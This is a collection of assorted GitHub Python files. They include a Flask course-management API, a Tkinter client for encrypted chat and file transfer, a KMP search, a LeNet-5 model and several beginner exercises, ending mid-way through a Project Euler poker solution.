get_lj_courses_id(ljourney_id):\n courseDetails = (get_course_details(course[0]))\n \n if courseDetails != []:\n courseId = courseDetails[0][0]\n courseName = courseDetails[0][1]\n courseDesc = courseDetails[0][2]\n \n # check course status and registration\n # get staffid \n staffId = get_lj_details(ljourney_id)\n staffId = str(staffId[0][1])\n\n # get course status and registration\n courseStatusDetails = get_course_registration_by_staffId(staffId, courseId)\n # extract actual status\n if courseStatusDetails == []:\n print(courseStatusDetails)\n courseStatus = \"Incomplete\"\n else:\n print(courseStatusDetails[0][2])\n if courseStatusDetails[0][2] == '':\n courseStatus = courseStatusDetails[0][1]\n else:\n courseStatus = courseStatusDetails[0][2]\n\n courseList.append([courseId, courseName, courseStatus, courseDesc])\n \n skillCourseDetails = [[skillId, skill[1]], courseList]\n skillList.append(skillCourseDetails)\n print(skillCourseDetails)\n status = ljDetails[0][3]\n result = [ljourney_id, roleName, skillList, status]\n return jsonify(\n {\n \"data\": result\n }\n ), 200\n# [END] Function to Get relevant courses that has not been added to a selected learning journey \n\n\n# [START] Function to add courses from specific learning journey\n@ljManagementFunctions.route(\"/addCoursesToLj\", methods=[\"POST\"])\ndef addCoursesToLj():\n # check for missing inputs\n data = request.get_json()\n if not all(key in data.keys() for\n key in ('selectedLj', 'selectedCourses')):\n return jsonify({\n \"message\": \"Incorrect JSON object provided.\"\n }), 500\n \n # if form validation succesful\n try:\n selectedLj = data['selectedLj']\n selectedCourses = data['selectedCourses']\n for course in selectedCourses:\n query = \"INSERT INTO LJ_Course VALUES (%s, %s)\"\n course_data = (selectedLj, course)\n cursor.execute(query, course_data)\n db_connection.commit()\n return \"success\"\n\n except Exception:\n return jsonify({\n \"message\": \"Unable to commit to database.\"\n }), 500\n# [END] Function to add courses from specific learning journey\n\n# -------- Staff Add Learning Journey Courses Functions ---------\n# ---------------------------- End -----------------------------\n\n\n# ------ Staff Remove Learning Journey Courses Functions -------\n# --------------------------- Start -----------------------------\n\n# [START] Function to remove courses from specific learning journey\n@ljManagementFunctions.route(\"/removeCoursesFromLj\", methods=[\"POST\"])\ndef removeCoursesFromLj():\n # check for missing inputs\n data = request.get_json()\n \n if not all(key in data.keys() for\n key in ('selectedLj', 'selectedCourses')):\n return jsonify({\n \"message\": \"Incorrect JSON object provided.\"\n }), 500\n \n # if form validation succesful\n try:\n selectedLj = data['selectedLj']\n selectedCourses = data['selectedCourses']\n for course in selectedCourses:\n query = \"DELETE FROM LJ_Course WHERE ljourney_id = (%s) AND course_id= (%s)\"\n course_data = (selectedLj, course)\n cursor.execute(query, course_data)\n db_connection.commit()\n return \"course deletion success\"\n\n except Exception:\n return jsonify({\n \"message\": \"Unable to commit to database.\"\n }), 500\n# [END] Function to remove courses from specific learning journey\n\n# ------ Staff Remove Learning Journey Courses Functions -------\n# ---------------------------- End ------------------------------","repo_name":"Kodajak/SPM_G4T2","sub_path":"flask/ljManagementFunctions/ljManagementFunctions.py","file_name":"ljManagementFunctions.py","file_ext":"py","file_size_in_byte":19812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73912842384","text":"dic1={1:10, 2:20}\n\ndic2={3:30, 4:40}\n\ndic3={5:50,6:60}\n \n# | - pipe symbol to merge two or more dictionaries \n\ndic4 = dic1 | dic2 | dic3\n\nprint(\"Merged Dictionary: \", dic4)\n","repo_name":"bhattaditya/Python-Practise","sub_path":"Dictionary/concatinate.py","file_name":"concatinate.py","file_ext":"py","file_size_in_byte":173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27335810752","text":"def Iccanobif(x):\n list = [1]\n r = 1\n for i in range(x-1):\n list.append(r)\n r = r + list[i]\n\n return list[::-1]\n\n\nx = int(input())\nlist = \" \".join(map(str, Iccanobif(x)))\nprint(list)","repo_name":"piedro404/resolucoes-de-problemas","sub_path":"Uri/Iccanobif.py","file_name":"Iccanobif.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"3038587585","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\nimport os\nimport socket\nimport errno\nimport select\nimport logging\nimport traceback\n\n\n__all__ = ['EventLoop', 'EPOLL_NULL', 'EPOLL_IN',\n 'EPOLL_OUT', 'EPOLL_ERR', 'EPOLL_HUP', 'EVENT_NAMES']\n\n\nEPOLL_NULL = 0x00\nEPOLL_IN = select.EPOLLIN\nEPOLL_OUT = select.EPOLLOUT\nEPOLL_ERR = select.EPOLLERR\nEPOLL_HUP = select.EPOLLHUP\n\n\nEVENT_NAMES = {\n EPOLL_NULL: 'EPOLL_NULL',\n EPOLL_IN: 'EPOLL_IN',\n EPOLL_OUT: 'EPOLL_OUT',\n EPOLL_ERR: 'EPOLL_ERR',\n EPOLL_HUP: 'EPOLL_HUP',\n}\n\n\n\nclass EpollLoop(object):\n '''using epoll event loop'''\n\n def __init__(self):\n self._epoll = select.epoll()\n\n def poll(self, timeout):\n return self._epoll.poll(timeout)\n\n def add_fd(self, fd, mode):\n self._epoll.register(fd, mode)\n\n def remove_fd(self, fd):\n self._epoll.unregister(fd)\n\n def modify_fd(self, fd, mode):\n self._epoll.modify(fd, mode)\n\n def close(self):\n self._epoll.close()\n\nclass EventLoop(object):\n\n TIMEOUT=3.6\n\n def __init__(self):\n self._impl = EpollLoop()\n self._fd_to_sock = {}\n self._handlers = []\n self.stopping = False\n\n def poll(self, timeout=None):\n events = self._impl.poll(timeout)\n return [ (self._fd_to_sock[fd], fd, event) for fd, event in events]\n\n def add(self, sock, mode):\n fd = sock.fileno()\n self._fd_to_sock[fd] = sock\n self._impl.add_fd(fd, mode)\n\n def remove(self, sock):\n fd = sock.fileno()\n del self._fd_to_sock[fd]\n self._impl.remove_fd(fd)\n\n def modify(self, sock, mode):\n fd = sock.fileno()\n self._impl.modify_fd(fd, mode)\n\n def add_handler(self, handler):\n self._handlers.append(handler)\n\n #copy paste modify from shadowsocks/eventloop.py\n def run(self):\n logging.info(\"starting eventloop...\")\n while not self.stopping:\n try:\n events = self.poll(self.TIMEOUT)\n except (OSError, IOError) as e:\n if errno_from_exception(e) == errno.EPIPE:\n # Happens when the client closes the connection\n logging.error('poll:%s', e)\n continue\n else:\n logging.error('poll:%s', e)\n traceback.print_exc()\n continue\n for handler in self._handlers:\n # TODO when there are a lot of handlers\n try:\n handler(events)\n except (OSError, IOError) as e:\n logging.error(e)\n traceback.print_exc()\n\n def close(self):\n self.stopping = True\n self._impl.close()\n\n\n# from tornado\ndef errno_from_exception(e):\n \"\"\"Provides the errno from an Exception object.\n\n There are cases that the errno attribute was not set so we pull\n the errno out of the args but if someone instatiates an Exception\n without any args you will get a tuple error. So this function\n abstracts all that behavior to give you a safe way to get the\n errno.\n \"\"\"\n\n if hasattr(e, 'errno'):\n return e.errno\n elif e.args:\n return e.args[0]\n else:\n return None\n\n\n# from tornado\ndef get_sock_error(sock):\n error_number = sock.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)\n return socket.error(error_number, os.strerror(error_number))\n\n","repo_name":"junfenglx/sockchat","sub_path":"eventloop.py","file_name":"eventloop.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39828660270","text":"print(\"Welcome! This is my very first python project and calculator. I hope you enjoy!\")\r\nprint(\"Please type in: Add, Subtract, Multiply, Divide\")\r\ninstruction = str(input(\"Your choice: \"))\r\nif instruction == \"Add\" or instruction == \"add\":\r\n num_1 = int(input(\"Number: \"))\r\n num_2 = int(input(\"Number: \"))\r\n add = num_1 + num_2\r\n print(\"Result: \", add)\r\nelif instruction == \"Subtract\" or instruction == \"subtract\":\r\n num_1 = int(input(\"Number: \"))\r\n num_2 = int(input(\"Number: \"))\r\n subtract = num_1 - num_2\r\n print(\"Result: \", subtract)\r\nelif instruction == \"Multiply\" or instruction == \"multiply\":\r\n num_1 = int(input(\"Number: \"))\r\n num_2 = int(input(\"Number: \"))\r\n multiply = num_1 * num_2\r\n print(\"Result: \", multiply)\r\nelif instruction == \"Divide\" or instruction == \"divide\":\r\n num_1 = int(input(\"Number: \"))\r\n num_2 = int(input(\"Number: \"))\r\n division_quotient = num_1 // num_2\r\n division_remainder = num_1 % num_2\r\n print(\"Quotient: \", division_quotient)\r\n print(\"Remainder: \", division_remainder)\r\nelse:\r\n print(\"Please make a correct choice.\")","repo_name":"Coder44/Calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72843296147","text":"class KMP(object):\n def contains_pattern(self, string, pattern):\n string_index = 0\n pattern_index = 0\n pattern_table = build_kmp_table(pattern)\n contains = False\n while string_index < len(string):\n if string[string_index] == pattern[pattern_index]:\n pattern_index += 1\n if pattern_index == len(pattern):\n contains = True\n break\n else:\n pattern_index = pattern_table[pattern_index]\n string_index += 1\n return contains\n \n\n\n def build_kmp_table(self,pattern, print_table = False):\n j = 0\n i = 1\n table = [0 for l in pattern] \n while i < len(pattern) :\n if pattern[i] == pattern[j]:\n table[i] = j + 1\n i += 1\n j += 1\n elif j>0:\n j = table[j-1]\n else:\n table[i] = 0\n i += 1\n if print_table:\n for i in table:\n print(i, end = ' ')\n print('') \n return table\n\n\n\n","repo_name":"esmason/Bioinformatics-Python-Scripts","sub_path":"searchString/kmp.py","file_name":"kmp.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13734197052","text":"# #\n# #\nimport math\nimport os\nimport random\nimport re\nimport sys\n\nn = int(input(\"Enter any integer n: \"))\n\nif n in range(1,101):\n if (n % 2 == 1):\n print(\"Weird\")\n if (n% 2 == 0):\n if n in range(2, 6):\n print(\"Not Weird\")\n if n in range(6, 21):\n print(\"Weird\")\n if n in range(21, 101):\n print(\"Not Weird\")\n\n\n\n\n\n\n\n\n\n\n\n\n# #\n# #\n# #\n# #\n# #\n# #\n# #\n# def is_leap(year):\n# leap = False\n#\n# year = int(input(i))\n#\n# i= (range(1900, (10 ** 5) + 1)\n# if (i % 100 == 0):\n# if (i % 400 == 0):\n# print(True)\n# else:\n# print(False)\n# elif (i % 4 == 0):\n# print(True)\n# else:\n# print(False)\n#\n#\n#\n# print(is_leap(year))\nimport calendar\n\nmonth=int(input(\" \"))\ndate=int(input(\" \"))\nyear=int(input(' '))\ncalendar.weekday(year,month,day)\n\n\nprint(weekday(day))","repo_name":"ajayp1717/Python-Projects","sub_path":"Python Practice/Hackerank problem.py","file_name":"Hackerank problem.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13404314135","text":"__author__ = 'Rui'\n\nif __name__ == '__main__':\n from redis import Redis\n from rq_scheduler import Scheduler\n from datetime import datetime\n import data_collector\n import settings.config as config\n\n scheduler = Scheduler(connection=Redis())\n scheduler.schedule(\n scheduled_time=datetime.now(), # Time for first execution, in UTC timezone\n func=data_collector.get_line_status,\n args=[config.ACTIVE_BACKEND],\n kwargs={}, # Keyword arguments passed into function when executed\n interval=120, # Time before the function is called again, in seconds\n repeat=None,\n result_ttl=0 # Repeat this number of times (None means repeat forever)\n )\n\n","repo_name":"ruiminde/TubeService","sub_path":"task_schedule.py","file_name":"task_schedule.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32223258301","text":"import tkinter as tk\nfrom tkinter import ttk\nimport threading\nimport socket as s\nimport os\nfrom cryptage import RSAEncryption\nimport pickle as pck\nimport tqdm\nimport re\nfrom cryptography.fernet import Fernet\nimport time\nimport numpy as np\nclass Widget:\n def addInput(self,side=\"top\", **kwargs):\n _ = tk.Entry(self, **kwargs)\n _.pack(side=side)\n return _\n\n def addbtn(self,side=\"top\", **kwargs):\n _ = ttk.Button(self, **kwargs)\n _.pack(side=side)\n return _\n\n def addLabel(self,side=\"top\",**kwargs):\n _ = tk.Label(self,**kwargs)\n _.pack(side=side)\n return _\n \n def addFileInput(self, side=\"top\", **kwargs):\n _ = tk.Message(self, **kwargs)\n _.pack(side=side)\n return _\n \n def addListBox(self, side=\"top\", **kwargs):\n _ = tk.Listbox(self, **kwargs)\n return _\n\n def addComboBox(self,_list=[],**kwargs):\n l = ttk.Combobox(self,values=_list, **kwargs)\n l.pack()\n return l\n\nclass App(tk.Tk,Widget):\n client = s.socket()\n SEPARATOR = \"\"\n BUFFERSIZE = 2048\n def __init__(self): \n tk.Tk.__init__(self)\n frame = tk.Frame(self)\n frame.pack()\n self.zone = self.addLabel(side='top')\n\n self.frame = frame\n\n self.message = list()\n\n self.addLabel(\n text=\"message\"\n ).place(x=100,y=0)\n\n self.message = list()\n\n self.addLabel(\n text=\"Destinataire\"\n ).place(x=100,y=110)\n\n self.addLabel(\n text=\"Liste des clients connecter\"\n ).place(x=190,y=190)\n\n self.listbox = self.addListBox(height=5,width=80)\n self.listbox.place(x=10, y=20)\n\n self.listuser = self.addListBox(height=3,width=80)\n self.listuser.place(x=10, y=130)\n\n self.listclient = list()\n\n self.combobox = self.addComboBox(width=60,_list=[])\n self.combobox.place(x=60,y=210)\n self.addbtn(text=\"ajouter\",width=62,\n command= self.ajouter\n ).place(\n x=60,y=235\n )\n self.addbtn(text=\"effacer\",width=62,\n command= self.effacer\n ).place(\n x=60,y=260\n )\n self._listuser= list()\n self.key = dict()\n self.text = self.addLabel(text=\"\",side=\"bottom\")\n\n def ajouter(self):\n val = self.combobox.get()\n if val != \"\":\n self.listuser.insert(tk.END, val)\n self._listuser.append(val)\n\n def effacer(self):\n self.listuser.delete(first=0, last=len(self._listuser)-1)\n self._listuser = []\n\n def _send(self,data):\n self.client.send(data)\n \n def connect(self,host=\"localhost\",port=5555):\n self.client.connect((host,port))\n d, e, n = RSAEncryption._key(1024)\n \n self.client.send(pck.dumps(\n ('cle',pck.dumps((d,n)))\n ))\n self.decryptage = RSAEncryption(use_to_encrypt=False)\n self.decryptage.set_private_key((e,n))\n def recvMessage():\n while True:\n serverMessage = self.client.recv(self.BUFFERSIZE)\n decode = pck.loads(serverMessage)\n self.message.append(decode)\n if decode[0] == \"addr\":\n self.title(decode[1])\n if decode[0] == \"listclient\":\n self._clients = decode[1]\n self.listclient=self._clients['addr']\n cle = self._clients['cle']\n for i in self.listclient:\n cryptage = RSAEncryption()\n cryptage.set_public_key(cle[i])\n self.key[i] = cryptage\n self.combobox['values'] = self.listclient\n msg = f\"Server: {decode[0]}\\n {decode[1]}\"\n self.listbox.insert(tk.END,msg)\n print(\"[+]\",msg)\n \n if decode[0] == \"message\":\n msg = f\"{decode[1]['from']}: {self.decryptage.decrypter(decode[1]['value'])}\"\n self.listbox.insert(tk.END,msg)\n print(\"[+]\",msg)\n\n if decode[0] == \"filename\":\n filedetail = decode[1]\n filename = filedetail['filename']\n filesize = filedetail['filesize']\n sender = filedetail['from']\n cle = filedetail['cle']\n cle = self.decryptage.decrypter_bin(cle)\n fernet_decrypt = Fernet(cle)\n self.listbox.insert(\n tk.END, f\"{sender}: {filename} ({filesize}B)\")\n progress = range(filesize)\n filecr = bytes()\n pr = int()\n t0 = 0\n avg = list()\n try:\n for _ in progress:\n t0 = time.time()\n avg.append(t0)\n crypted = self.client.recv(248)\n pr = progress.stop\n if crypted.decode().__contains__(\"<\"):\n i = crypted.decode().index(\"<\")\n if crypted[:i] is not b'':\n byte_read = fernet_decrypt.decrypt(crypted[:i])\n filecr += byte_read\n t0 = time.time() - t0\n avg.append(t0)\n progress = range(filesize-len(byte_read))\n break\n else:\n byte_read = fernet_decrypt.decrypt(crypted)\n filecr += byte_read\n t0 = time.time() - t0\n avg.append(t0)\n progress = range(filesize-len(byte_read))\n os.chdir(\"./receive\")\n with open(filename,\"wb\") as f:\n self.text['text'] = \"Reception fini.... Ecriture en cours......\"\n print(self.text['text'])\n f.write(filecr)\n self.text['text'] = \"Ecriture du fichier fini\"\n print(self.text['text'])\n except Exception as e:\n print(\"Exception \",e)\n thread = threading.Thread(target=recvMessage)\n thread.daemon = True\n thread.start()\n\n\n def send(self):\n t = self.text.get()\n t = ('message', t)\n t = pck.dumps(t)\n self._send(t)\n","repo_name":"FinaritrAndrianiaina/filetransfer","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":6744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19913062345","text":"import json\nimport sys\nimport re\nfrom tqdm import tqdm\n\n\nif __name__ == '__main__':\n\n filenames = [\"code-mixed-dataset/bengali/dialog-dstc2-tst.txt\",\n \"code-mixed-dataset/english/dialog-dstc2-tst.txt\",\n \"code-mixed-dataset/gujarati/dialog-dstc2-tst.txt\",\n \"code-mixed-dataset/hindi/dialog-dstc2-tst.txt\",\n \"code-mixed-dataset/tamil/dialog-dstc2-tst.txt\"\n ]\n \n json_data = {\"version\":\"1.0\",\"data\":[]}\n\n for filename in filenames:\n with open(filename,\"r\") as fp:\n data = fp.readlines()\n title = filename.split(\"/\")[1]\n lang_data = {\"title\":title,\"paragraphs\":[]}\n context_str = \"\"\n for line in tqdm(data):\n if \"\\t\" in line and line != \"\\n\":\n splits = line.strip().split(\"\\t\")\n speakerA = \" \".join(splits[0].split(\" \")[1:]).strip()\n speakerA = re.sub(\"\",\"[SILENCE]\",speakerA)\n speakerB = splits[1].strip()\n context_str += \"Speaker A: \"+speakerA+\"\\n\\nSpeaker B: \"+speakerB+\"\\n\\n\"\n elif \"\\t\" not in line and line != \"\\n\":\n triple = \" \".join(line.strip().split(\" \")[1:])\n context_str += \"KB Triple: \"+triple+\"\\n\\n\"\n elif line == \"\\n\":\n context_dict = {\"context\":context_str}\n lang_data[\"paragraphs\"].append(context_dict)\n context_str = \"\"\n json_data[\"data\"].append(lang_data)\n \n\n with open(\"code-mixed-dataset/test-v1.0.json\",\"w+\") as fp:\n json.dump(json_data,fp)\n\n\n\n\n \n \n\n \n \n\n","repo_name":"sumanbanerjee1/Code-Mixed-Dialog-website","sub_path":"json_format_data.py","file_name":"json_format_data.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16174949643","text":"# Import unpack from parent directory\nimport sys\nimport os\n\ncurrent = os.path.dirname(os.path.realpath(__file__))\nparent_directory = os.path.dirname(current)\nsys.path.append(parent_directory)\n\nimport unpack\nfrom unpack import CityNetwork\n\nimport random\nimport time\n\n@unpack.timer_decorator\ndef main():\n # LOAD THE NETWORK (SIMILAR AS BEFORE)\n name = 'Delft_center_walk'\n data_folder = 'data/'\n vehicle_type = 'walk' # walk, bike, drive, all (See osmnx documentation)\n\n # Give a name, to avoid overwriting your plots\n session_name = input(\"Please insert a name for this multiplot session: \")\n\n ''' --- GENERATE NETWORK ---\n Generate a new network using the functions in the CityNetwork class. If a network already has been generated and stored in the data folder, comment this part and continue with PREPARE NETWORK. '''\n coordinates = [52.018347, 52.005217, 4.369142, 4.350504]\n \n # Initialize CityNetwork object [N, S, E, W]\n City = CityNetwork(name, coordinates, vehicle_type)\n \n # Load osm from local or online file\n City.load_osm_graph(data_folder + name + '.osm')\n City.load_building_addr(data_folder + name + '_building_addresses.csv', \n data_folder + name + '_buildings.csv', \n data_folder + name + '_addresses.csv',\n data_folder +'runtime/'+ name + '_cbs.xml')\n \n print(City.building_addr_df)\n\n # Add speeds, lengths and distances to graph\n # Overwrite speed by using overwrite_bike=16\n # Further types available: overwrite_walk and overwrite_epv\n City.add_rel_attributes(overwrite_bike=16, overwrite_walk=5)\n\n # Add an experience attribute to the graph, inputs are\n # edges: list with edges to overwrite\n # factors: list of factors between 0 and float(inf), lower is better\n\n # Project graph\n City.project_graph()\n\n ''' EXAMPLE HIGHLIGHTS WITH EXPERIENCE\n Assign bonus or penalty to the Oude Delft \n > 1 is bonus\n < 1 is penalty\n\n Function takes as input: name/coordinate_tuple, factor\n City.add_street_experience(['Oude Delft'], [10])\n OR\n City.add_coord_experience([(latitude, longitude)], [10])\n '''\n\n # Plot the CityNetwork\n # City.plot()\n\n # Calculate dataframes of nodes and edges\n City.convert_graph_edges_to_df()\n City.convert_graph_nodes_to_df()\n\n # Save graph edges to file\n # City.graph_edges_df.to_csv('data/test.csv')\n\n # Save Pickle file\n City.save_graph(name, data_folder)\n print('------------------------------------') \n\n # Load the CityNetwork\n City = CityNetwork.load_graph(name, data_folder)\n\n # City.plot(show=True)\n\n # CALCULATE NEAREST EDGES IF NOT AVAILABLE IN City.ne \n # City.ne = None\n dest_edges = City.nearest_edges(5, cpus=12)\n City.save_graph(name, data_folder)\n\n\n # REMOVE OUTLIERS FROM A CERTAIN DISTANCE\n City.drop_outliers(30)\n dest_edges = City.ne\n\n # Extract the new destinations skipping the outliers\n destinations = City.get_yx_destinations()\n\n # MULTICORE V2 STARTS HERE:\n # Compute shortest paths by hub for n clustering iterations\n # Hubs are randomly placed each iteration, just as example\n cluster_iterations = []\n num_hubs = 48\n num_iterations = 1\n\n for i in range(num_iterations):\n # Random seed, to compare results for different parameters\n random.seed(2)\n\n # Delft Center\n # Should be defined by k++ version of k-means in final algorithm\n # hubs = [(random.randint(6801030, 6803490), random.randint(484261, 486397)) for _ in range(num_hubs)]\n \n # Full Delft\n hubs = [(random.randint(6792760, 6805860), random.randint(478510, 490000)) for _ in range(num_hubs)]\n\n print(f\"Cluster iteration {i} started...\")\n start=time.time()\n\n # Calculate shortest paths by hub\n # Check the code for description of inputs.\n start = time.time()\n paths = unpack.multicore_single_source_shortest_path(City.graph, hubs, destinations, dest_edges,\n skip_non_shortest=False, \n skip_treshold=60,\n weight='travel_time', \n cutoff=None, \n cpus=12\n )\n end = time.time()\n print(end-start)\n\n colors = ['red', 'orange', 'yellow', 'pink', 'purple', 'peru']\n\n # Show the results\n paths_df = unpack.paths_to_dataframe(paths, colors, hubs=hubs)\n print(paths_df)\n\n '''\n\n CALCULATE FITNESS HERE\n REPOSITION THE HUBS BASED ON K-MEANS CLUSTERING \n \n '''\n\n # Add to cluster_iterations results\n cluster_iterations.append(paths)\n\n end=time.time()\n\n print(f\"Cluster iteration {i} finished in {end-start}s...\")\n \nif __name__ == '__main__':\n main()","repo_name":"lm2-me/CORE","sub_path":"examples/example_multicore_v2.py","file_name":"example_multicore_v2.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35749850992","text":"import keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Conv2D\r\nfrom keras.layers import MaxPooling2D\r\nfrom keras.layers import Flatten\r\nfrom keras.layers import Dense\r\n\r\nmodel = Sequential()\r\n\r\n# Etapa de convolução\r\nmodel.add(Conv2D(filters=6, kernel_size=5, strides=1, activation='relu', input_shape=(32, 32, 1)))\r\nmodel.add(MaxPooling2D(pool_size=2, strides=2))\r\nmodel.add(Conv2D(filters=16, kernel_size=5, strides=1, activation='relu', input_shape=(14, 14, 6)))\r\nmodel.add(MaxPooling2D(pool_size=2, strides=2))\r\nmodel.add(Flatten())\r\n\r\n# Criação da rede neural\r\nmodel.add(Dense(units=120, activation='relu'))\r\nmodel.add(Dense(units=84, activation='relu'))\r\nmodel.add(Dense(units=10, activation='softmax'))\r\n\r\n# Etapa de treinamento\r\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\r\nmodel.fit(x_train, y_train, steps_per_epoch=10, epochs=42)\r\n\r\n# Etapa de teste\r\ny_pred = model.predict(x_test)\r\n\r\n# Salvando os pesos treinados\r\nlabels = np.argmax(y_pred, axis=1)\r\nindex = np.arange(1, 28001)\r\nlabels = labels.reshape([len(labels), 1])\r\nindex = index.reshape([len(index), 1])\r\nfinal = np.concatenate([index, labels], axis=1)\r\nnp.savetxt(\"mnist_1.cvs\", final, delimiter=\" \", fmt='%s')\r\n","repo_name":"ArthurGM18/CNN","sub_path":"LeNet-5/leNet5.py","file_name":"leNet5.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10615612723","text":"students = {}\nlesson = \"\"\n\nwhile True:\n command = input()\n\n if \":\" in command:\n name, id, keys = command.split(\":\")\n if keys not in students:\n students[keys] = []\n students[keys].append(f\"{name} - {id}\")\n else:\n if \"_\" in command:\n lesson = command.replace(\"_\", \" \")\n break\n else:\n lesson = command\n break\n\nprint('\\n'.join(students[lesson]))","repo_name":"AlexanderBedrosyan/Programming-Fundamentals-with-Python","sub_path":"Dictionaries - Lab/students_1.py","file_name":"students_1.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"5160992058","text":"while True:\r\n user = int(input())\r\n if user == 0:\r\n break\r\n matriz = []\r\n v = 0\r\n for c in range(user):\r\n linha = []\r\n for v in range(user):\r\n linha.append(1)\r\n matriz.append(linha)\r\n val = 1\r\n rig = user - 1\r\n lef = 0\r\n up = 0\r\n down = user - 1\r\n mid = user / 2 if user % 2 == 0 else (user + 1) / 2\r\n while val <= mid:\r\n for c in range(lef, rig + 1):\r\n matriz[c][lef] = val\r\n matriz[c][rig] = val\r\n for c in range(up, down + 1):\r\n matriz[up][c] = val\r\n matriz[down][c] = val\r\n val += 1\r\n rig -= 1\r\n lef += 1\r\n up += 1\r\n down -= 1\r\n for c in range(user):\r\n for v in range(user):\r\n if v == user - 1:\r\n print('{:3}'.format(matriz[c][v]))\r\n else:\r\n print('{:3}'.format(matriz[c][v]), end=' ')\r\n print('')\r\n","repo_name":"Rkluk/uri","sub_path":"1435 Matriz Quadrada I FINAL eu acho.py","file_name":"1435 Matriz Quadrada I FINAL eu acho.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12634124167","text":"#################################\n# PROJECT EULER - PROBLEM 054 #\n#################################\nimport time\n\n\ndef get_card_values(hand: list[str]) -> tuple:\n \"\"\" Given a hand, return a tuple of the card values (2 <= value <= 14) in\n it, sorted in decreasing order. For example, for the hand 9D 6S QH 6H QC,\n the function returns (12, 12, 9, 9, 6). (Note that a Queen's value is 12).\n \"\"\"\n cards = []\n for string in hand:\n cards.append(string[0])\n return tuple(reversed(sorted([VALUES[card] for card in cards])))\n\n\ndef get_weighted_card_values(hand: list[str]) -> tuple:\n \"\"\" To be able to compare two hands, we would like to sort the card values\n in a given hand in decreasing order by number of occurrences, and for two\n cards which occur the same number of times, the one with the highest value\n should appear first. Because this is not easy to implement, we instead sort\n in decreasing order by _weighted_ card values, where the weighted card\n value of a card is given by:\n value of the card + 15 * (# times it occurs - 1)\n In the end, this achieves the same result as intended originally. For\n example, for the hand 9D 6S QH 6H QC, the function returns\n (27, 27, 21, 21, 9) = (12 + 15, 12 + 15, 6 + 15, 6 + 15, 9).\n (Note that a Queen's value is 12). \"\"\"\n cards = []\n for string in hand:\n cards.append(string[0])\n return tuple(reversed(sorted([VALUES[card] + 15 * (cards.count(card) - 1)\n for card in cards])))\n\n\ndef get_card_frequencies(hand: list[str]) -> tuple:\n \"\"\" Given a hand, returns the card frequencies as a tuple sorted in\n decreasing order. For example, for the hand 9D 6S QH 6H QC,\n the function returns (2, 2, 1). This function will be used to check if a\n hand has one pair, two pairs, etc... \"\"\"\n cards = []\n for string in hand:\n cards.append(string[0])\n return tuple(reversed(sorted([cards.count(card) for card in set(cards)])))\n\n\ndef are_all_of_the_same_suit(hand: list[str]) -> bool:\n \"\"\" Given a hand, decides if all cards in the hand are of the same suit.\n This will be used to check if we have a (straight, royal) flush.\"\"\"\n suits = set()\n for string in hand:\n suits.add(string[1])\n if len(suits) == 1:\n return True\n else:\n return False\n\n\ndef are_consecutive_values(hand: list[str]) -> bool:\n \"\"\" Given a hand, decides if its cards are of consecutive values. \"\"\"\n card_values = get_card_values(hand)\n for k in range(len(card_values) - 1):\n if card_values[k] != card_values[k + 1] + 1:\n return False\n return True\n\n\ndef get_hand_score(hand: list[str]) -> int:\n \"\"\" Given a hand, assigns a score between 1 and 10 to it, corresponding to\n the ten 'ranks' described in the problem statement. (A higher score is\n better than a lower score). \"\"\"\n card_frequencies = get_card_frequencies(hand)\n card_values = get_card_values(hand)\n score = 1\n\n if card_frequencies == (2, 1, 1, 1):\n score = 2\n if card_frequencies == (2, 2, 1):\n score = 3\n if card_frequencies == (3, 1, 1):\n score = 4\n if card_frequencies == (3, 2):\n score = 7\n if card_frequencies == (4, 1):\n score = 8\n if are_consecutive_values(hand) and score < 5:\n score = 5\n if are_all_of_the_same_suit(hand):\n if score < 6:\n score = 6\n if are_consecutive_values:\n score = 9\n if card_values == (14, 13, 12, 11, 10):\n score == 10\n return score\n\n\ndef tie_break(hand_1: list[str], hand_2: list[str]) -> int:\n \"\"\" If two hands have the same score, this function breaks the tie. \"\"\"\n if get_weighted_card_values(hand_1) > get_weighted_card_values(hand_2):\n return 1\n return 0\n\n\nstart = time.time()\n\nVALUES = {card: value for value, card in enumerate('23456789TJQKA', 2)}\n\n# Extract the hands of both players and store them in a list.\nhands_player_1: list[list[str]] = []\nhands_player_2: list[list[str]] = []\nwith open('p054_poker.txt') as file_object:\n for line in file_object:\n cards = line.rstrip().split(' ')\n hands_player_1.append(cards[:5])\n hands_player_2.append(cards[5:])\n\n\n# Calculate player 1's score.\ntotal_score_player_1 = 